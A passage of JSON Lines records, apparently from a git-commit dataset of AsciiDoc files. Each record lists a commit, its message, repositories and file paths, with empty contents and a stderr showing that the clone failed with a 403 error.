security\n","repos":"verydapeng\/boot-works,verydapeng\/boot-works,mygithubwork\/boot-works,mygithubwork\/boot-works","old_file":"security.adoc","new_file":"security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b633c5cd94dab538d560364f4357345abf57adb6","subject":"Update 2015-02-24-Need-h1-to-save.adoc","message":"Update 2015-02-24-Need-h1-to-save.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-Need-h1-to-save.adoc","new_file":"_posts\/2015-02-24-Need-h1-to-save.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"553a2e570a9b532d8340c0de0b953838b328fe63","subject":"Update 2016-09-11-Blogging-Begins.adoc","message":"Update 2016-09-11-Blogging-Begins.adoc","repos":"blogforfun\/blogforfun.github.io,blogforfun\/blogforfun.github.io,blogforfun\/blogforfun.github.io,blogforfun\/blogforfun.github.io","old_file":"_posts\/2016-09-11-Blogging-Begins.adoc","new_file":"_posts\/2016-09-11-Blogging-Begins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blogforfun\/blogforfun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7520a8cc3c886cfc047c43fb54da8b40ed42c7a8","subject":"Update 2018-06-08-Swift-Firestore.adoc","message":"Update 2018-06-08-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0450c9d32eeb73c258ad0a01d4f44e3b3acb8d97","subject":"man\/man9\/delayline.9.asciidoc: fixer upper","message":"man\/man9\/delayline.9.asciidoc: fixer upper\n","repos":"ArcEye\/MK-Qt5,mhaberler\/machinekit,strahlex\/machinekit,strahlex\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit,mhaberler\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit,strahlex\/machinekit,mhaberler\/machinekit,mhaberler\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,mhaberler\/machinekit,araisrobo\/machinekit,strahlex\/machinekit,strahlex\/machinekit,mhaberler\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,araisrobo\/machinekit,strahlex\/machinekit,ArcEye\/MK-Qt5,araisrobo\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit","old_file":"man\/man9\/delayline.9.asciidoc","new_file":"man\/man9\/delayline.9.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/araisrobo\/machinekit.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"1516e02d872ff447594cd1ea2048e41766b158e3","subject":"Update 2016-10-27-init.adoc","message":"Update 2016-10-27-init.adoc","repos":"livehua\/livehua.github.io,livehua\/livehua.github.io,livehua\/livehua.github.io,livehua\/livehua.github.io","old_file":"_posts\/2016-10-27-init.adoc","new_file":"_posts\/2016-10-27-init.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/livehua\/livehua.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0b630954b0b2b66b02c70b9345b0fe0eb6751fb","subject":"Update 2018-08-30-Exception.adoc","message":"Update 2018-08-30-Exception.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-Exception.adoc","new_file":"_posts\/2018-08-30-Exception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf311d9b5419790843202e65b9f3f4958e444edd","subject":"Update 2012-08-12-Ben-Howard-Everything-Cover.adoc","message":"Update 2012-08-12-Ben-Howard-Everything-Cover.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2012-08-12-Ben-Howard-Everything-Cover.adoc","new_file":"_posts\/2012-08-12-Ben-Howard-Everything-Cover.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3f61cc88e274289e4c1b34f6eb65d9c3e7ac3d1","subject":"Update 2017-03-01-repost-DW-Cn-and-innovation.adoc","message":"Update 2017-03-01-repost-DW-Cn-and-innovation.adoc","repos":"thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io","old_file":"_posts\/2017-03-01-repost-DW-Cn-and-innovation.adoc","new_file":"_posts\/2017-03-01-repost-DW-Cn-and-innovation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomaszahr\/thomaszahr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97efac356b2c6616d0d1a3c841229fe7631f4c9d","subject":"Update 2015-09-21-Aceess-Control.adoc","message":"Update 2015-09-21-Aceess-Control.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Aceess-Control.adoc","new_file":"_posts\/2015-09-21-Aceess-Control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16c7d15db593caae491375046b21d99ab34c89d1","subject":"Update 2015-09-22-Een-nieuw-blog.adoc","message":"Update 2015-09-22-Een-nieuw-blog.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-09-22-Een-nieuw-blog.adoc","new_file":"_posts\/2015-09-22-Een-nieuw-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd9eca603af9f011455051d5af0980470a627c4b","subject":"Update 2016-03-11-Gorista-Design.adoc","message":"Update 2016-03-11-Gorista-Design.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-03-11-Gorista-Design.adoc","new_file":"_posts\/2016-03-11-Gorista-Design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd1085292a8247ccacd372295af38df6a6d28699","subject":"Renamed '_posts\/2019-01-31-Test-Blog-Post.adoc' to '_posts\/2017-01-31-Test-Blog-Post.adoc'","message":"Renamed '_posts\/2019-01-31-Test-Blog-Post.adoc' to '_posts\/2017-01-31-Test-Blog-Post.adoc'","repos":"SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io","old_file":"_posts\/2017-01-31-Test-Blog-Post.adoc","new_file":"_posts\/2017-01-31-Test-Blog-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SRTjiawei\/SRTjiawei.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66c06b386f189decc2570867ac1785c9aac29929","subject":"Add Changelog for 2.x","message":"Add Changelog for 2.x\n","repos":"codecentric\/spring-boot-admin,joshiste\/spring-boot-admin,codecentric\/spring-boot-admin,joshiste\/spring-boot-admin,joshiste\/spring-boot-admin,codecentric\/spring-boot-admin,joshiste\/spring-boot-admin","old_file":"spring-boot-admin-docs\/src\/main\/asciidoc\/changes-2.x.adoc","new_file":"spring-boot-admin-docs\/src\/main\/asciidoc\/changes-2.x.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshiste\/spring-boot-admin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de5c1adccf633d62dd48e6621a71767ca310c4b9","subject":"Update 2017-02-28-Hello-blog-World.adoc","message":"Update 2017-02-28-Hello-blog-World.adoc","repos":"OdieD8\/hubpress.io,OdieD8\/hubpress.io,OdieD8\/hubpress.io,OdieD8\/hubpress.io","old_file":"_posts\/2017-02-28-Hello-blog-World.adoc","new_file":"_posts\/2017-02-28-Hello-blog-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OdieD8\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0741687baa683a2b6fe827d40466e61c8c86005","subject":"Update 2017-06-08-My-English-Title.adoc","message":"Update 2017-06-08-My-English-Title.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-08-My-English-Title.adoc","new_file":"_posts\/2017-06-08-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e18380a5266670456f19c5e798ea6edf8602308e","subject":"Update 2016-09-02-ObjC-Swift-Project-Name-Swifth.adoc","message":"Update 2016-09-02-ObjC-Swift-Project-Name-Swifth.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-09-02-ObjC-Swift-Project-Name-Swifth.adoc","new_file":"_posts\/2016-09-02-ObjC-Swift-Project-Name-Swifth.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df407728f9edaf01dcce3703de03422267ab14b4","subject":"Create do-codebase-improvements-es.adoc","message":"Create do-codebase-improvements-es.adoc\n\nSpanish translation for do-codebase-improvements.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-codebase-improvements-es.adoc","new_file":"src\/do\/do-codebase-improvements-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6209c4abf97da8904ed5de4aeea6534f20183090","subject":"Add README","message":"Add README\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"scratch\/csv2f64\/README.adoc","new_file":"scratch\/csv2f64\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb41bf91a31c4df08451afc6e38d27fd049b17db","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccfd7fc8be94b9f64a11f7ef5267928a36197340","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a43926b48869eb6b1e3c566930ae532a874f87a","subject":"Update 2018-05-26-Sobre-este-blog.adoc","message":"Update 2018-05-26-Sobre-este-blog.adoc","repos":"diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io","old_file":"_posts\/2018-05-26-Sobre-este-blog.adoc","new_file":"_posts\/2018-05-26-Sobre-este-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diogoan\/diogoan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77b73a915fddc1c382e095f4852e352cba1e7d31","subject":"Update 2019-03-12-A-B-Java-Script.adoc","message":"Update 2019-03-12-A-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9cb440d45ced12196f94ff6de4a6a42562c9d48","subject":"A guide about how to install the wal2json logical decoding plugin at Postgresql","message":"A guide about how to install the wal2json logical decoding plugin at Postgresql\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"docs\/install\/postgres-plugins.asciidoc","new_file":"docs\/install\/postgres-plugins.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"056b2347ab49d96df34135121ffa9d434e7517b0","subject":"Update 2015-04-08-Zweites-Posting.adoc","message":"Update 2015-04-08-Zweites-Posting.adoc","repos":"abien\/abien.github.io,abien\/abien.github.io,abien\/abien.github.io,abien\/abien.github.io","old_file":"_posts\/2015-04-08-Zweites-Posting.adoc","new_file":"_posts\/2015-04-08-Zweites-Posting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/abien\/abien.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcd240ac8cb5d2dcbe69704dc8037d382e657588","subject":"Update 2017-01-06-vultrandlaravel.adoc","message":"Update 2017-01-06-vultrandlaravel.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66a7cd94732fbb3c95afe1bf1ab79d18eb529154","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db8ea396f2f6df0e0a6f168d5e8b2066f9931cad","subject":"Added IoCs for Ousaban","message":"Added IoCs for Ousaban\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"ousaban\/README.adoc","new_file":"ousaban\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"6a6358eef470da7e4d43a667e429c470106888e6","subject":"Update 2016-12-08-November-Update.adoc","message":"Update 2016-12-08-November-Update.adoc","repos":"endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/endymion64.github.io,endymion64\/endymion64.github.io,endymion64\/VinJBlog","old_file":"_posts\/2016-12-08-November-Update.adoc","new_file":"_posts\/2016-12-08-November-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endymion64\/endymion64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5543a5266dcd04a5876830aac8da9b0c1be40b4d","subject":"Update 2018-03-13-P-H-Per-Golang2.adoc","message":"Update 2018-03-13-P-H-Per-Golang2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-13-P-H-Per-Golang2.adoc","new_file":"_posts\/2018-03-13-P-H-Per-Golang2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79b0413a62b3b0605c3d2f5a811cc5019c92f77c","subject":"Update 2017-05-31-Introduction-to-Net-Libaries-and-Runtime.adoc","message":"Update 2017-05-31-Introduction-to-Net-Libaries-and-Runtime.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-05-31-Introduction-to-Net-Libaries-and-Runtime.adoc","new_file":"_posts\/2017-05-31-Introduction-to-Net-Libaries-and-Runtime.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4a9c3d630433b2baf904b5e2ef0f16e46cfdfe6","subject":"added usage content to readme","message":"added usage content to readme\n","repos":"soosc\/metalsmith-publishon","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/soosc\/metalsmith-publishon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"539e953e4fbcbb0529175183d60c57dfbd12d617","subject":"Fixed project requirements","message":"Fixed project requirements\n\nLinks were updated and version information was dropped in order to\nspecify the bare minimum requirements and reduce situations where the\ndocumentation might not always be up-to-date with the *exact* version\nbeing used.\n","repos":"bkuhlmann\/ruby_setup,bkuhlmann\/ruby_setup","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/ruby_setup.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c5ff881647c30496549336a1b8232db5ad72907","subject":"Renamed '_posts\/2018-01-01-Math-Jax-Test.adoc' to '_posts\/2018-01-01-Controlling-Series-Elastic-Actuators.adoc'","message":"Renamed '_posts\/2018-01-01-Math-Jax-Test.adoc' to '_posts\/2018-01-01-Controlling-Series-Elastic-Actuators.adoc'","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2018-01-01-Controlling-Series-Elastic-Actuators.adoc","new_file":"_posts\/2018-01-01-Controlling-Series-Elastic-Actuators.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7275eff0773af5462a469f2718e7e9c3bb794991","subject":"added zagg client check SOP","message":"added zagg client check SOP\n","repos":"joelddiaz\/openshift-tools,twiest\/openshift-tools,jupierce\/openshift-tools,joelsmith\/openshift-tools,twiest\/openshift-tools,andrewklau\/openshift-tools,drewandersonnz\/openshift-tools,twiest\/openshift-tools,rhdedgar\/openshift-tools,ivanhorvath\/openshift-tools,blrm\/openshift-tools,rhdedgar\/openshift-tools,joelsmith\/openshift-tools,themurph\/openshift-tools,themurph\/openshift-tools,themurph\/openshift-tools,ivanhorvath\/openshift-tools,tiwillia\/openshift-tools,rhdedgar\/openshift-tools,tiwillia\/openshift-tools,andrewklau\/openshift-tools,ivanhorvath\/openshift-tools,tiwillia\/openshift-tools,openshift\/openshift-tools,openshift\/openshift-tools,andrewklau\/openshift-tools,twiest\/openshift-tools,jupierce\/openshift-tools,openshift\/openshift-tools,ivanhorvath\/openshift-tools,joelddiaz\/openshift-tools,andrewklau\/openshift-tools,tiwillia\/openshift-tools,openshift\/openshift-tools,joelddiaz\/openshift-tools,blrm\/openshift-tools,joelddiaz\/openshift-tools,joelddiaz\/openshift-tools,drewandersonnz\/openshift-tools,twiest\/openshift-tools,themurph\/openshift-tools,joelsmith\/openshift-tools,themurph\/openshift-tools,jupierce\/openshift-tools,joelsmith\/openshift-tools,ivanhorvath\/openshift-tools,andrewklau\/openshift-tools,jupierce\/openshift-tools,openshift\/openshift-tools,blrm\/openshift-tools,twiest\/openshift-tools,blrm\/openshift-tools,drewandersonnz\/openshift-tools,drewandersonnz\/openshift-tools,jupierce\/openshift-tools,blrm\/openshift-tools,joelddiaz\/openshift-tools,blrm\/openshift-tools,ivanhorvath\/openshift-tools,drewandersonnz\/openshift-tools,drewandersonnz\/openshift-tools,tiwillia\/openshift-tools,rhdedgar\/openshift-tools,openshift\/openshift-tools,rhdedgar\/openshift-tools","old_file":"docs\/zagg_client_checks.asciidoc","new_file":"docs\/zagg_client_checks.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openshift\/openshift-tools.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b13ad8e632263ba1f572d75801525f43025c7e2d","subject":"Update 2017-06-21-I-Heart-Hugs-Wood.adoc","message":"Update 2017-06-21-I-Heart-Hugs-Wood.adoc","repos":"polarbill\/polarbill.github.io,polarbill\/polarbill.github.io,polarbill\/polarbill.github.io,polarbill\/polarbill.github.io","old_file":"_posts\/2017-06-21-I-Heart-Hugs-Wood.adoc","new_file":"_posts\/2017-06-21-I-Heart-Hugs-Wood.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/polarbill\/polarbill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dedc3c07741ec3f025590049ca4e46e7519d3340","subject":"Update 2017-09-02-Java-File-vs-Path.adoc","message":"Update 2017-09-02-Java-File-vs-Path.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-09-02-Java-File-vs-Path.adoc","new_file":"_posts\/2017-09-02-Java-File-vs-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"696cd9852b34b1778ece22cd7ea458e593dc632c","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/clojurebridge.adoc","new_file":"content\/events\/2022\/clojurebridge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8e506a100b8a115b7fd1238ad8eb8a239035ffff","subject":"Add readme","message":"Add readme\n","repos":"ivargrimstad\/security-samples,ivargrimstad\/security-samples","old_file":"simple-embedded\/README.adoc","new_file":"simple-embedded\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/security-samples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f83d629d316e81b5eb44272d58b23af3227cc3fe","subject":"[DOC] Fix incorrect download versions","message":"[DOC] Fix incorrect download versions\n","repos":"girirajsharma\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df1c7a5a4335421d749506be7b9fe3e1cfa5f829","subject":"KUDU-1487 Add instructions for cutting a release","message":"KUDU-1487 Add instructions for cutting a release\n\nChange-Id: I5b52edb68d35d07ee50bb3c373bf866560f5bc93\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3614\nTested-by: Kudu Jenkins\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu","old_file":"RELEASING.adoc","new_file":"RELEASING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6bca420349d14e18619e87db5528a1374929ce0d","subject":"Update 2016-07-25-Watch-Disneylands-Paint-the-Night-tonight.adoc","message":"Update 2016-07-25-Watch-Disneylands-Paint-the-Night-tonight.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-07-25-Watch-Disneylands-Paint-the-Night-tonight.adoc","new_file":"_posts\/2016-07-25-Watch-Disneylands-Paint-the-Night-tonight.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8100537e901bfa66629da6fc4d85074886e896a4","subject":"Update 2012-01-26-Presentation-de-Dart-par-Gilad-Bracha.adoc","message":"Update 